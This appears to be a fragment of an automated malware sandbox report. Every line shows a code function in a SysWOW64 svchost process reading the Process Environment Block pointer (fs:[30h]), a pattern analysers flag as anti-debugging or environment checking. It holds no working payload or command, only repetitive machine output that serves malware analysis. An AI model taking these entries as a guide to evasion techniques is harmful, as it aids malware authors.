            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
